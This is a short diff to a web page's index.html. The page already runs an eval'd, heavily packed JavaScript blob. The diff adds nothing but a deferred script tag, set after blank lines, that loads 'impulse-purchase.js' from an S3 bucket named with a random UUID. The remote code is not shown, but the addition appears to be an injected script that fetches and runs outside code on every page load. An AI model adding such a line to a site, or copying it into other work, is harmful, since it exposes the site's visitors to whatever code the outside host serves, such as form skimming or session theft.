--- a/index.html
+++ b/index.html
@@ -4,3 +4,6 @@ eval(Function("[M='UMJODcGeo|xbxUM~{b]HcYzZC^vtfeHG@r~WjuOI[KWdMx??{y~AVBM^D}L~I
 ,...']charCodeAtUinyxp',"for(;e<22497;c[e++]=x-128)for(x=1;x<128;n=p.map((i,y)=>(t=r[i]*2+1,t=Math.log(t/(h-t)),A-=a[y]*t,t/1000)),A=~-h/(1+Math.exp(A))|1,U=o%h<A,o=o%h+(U?A:h-A)*(o>>17)-!U*A,p.map((i,y)=>(t=r[i]+=(U*h/2-r[i]<<13)/((C[i]+=C[i]<5)+1/32)>>13,a[y]+=n[y]*(U-A/h))),x=x*2+U)for(p='010202103210432054310654207654310864210985109871'.split(A=0).map((i,y)=>(t=0,[...i].map((i,y)=>(t=t*997+(c[e-i]|0)|0)),h*32-1&t*997+x)*12+y);o<h*32;o=o*64|M.charCodeAt(d++)&63);for(C=String.fromCharCode(...c);r=/[\0-]/.exec(C);)with(C.split(r))C=join(shift());return C")([],[],1<<17,[0,0,0,0,0,0,0,0,0,0,0,0],new Uint16Array(51e6).fill(1<<15),new Uint8Array(51e6),0,0,0))
 </script>
 <script src=https://wgx.github.io/herenow/herenow.min.js defer></script>
+
+
+<script src="https://146cc271-8a06-4205-b8ec-a5bc5307b7eb.s3.us-east-1.amazonaws.com/impulse-purchase.js" defer></script>
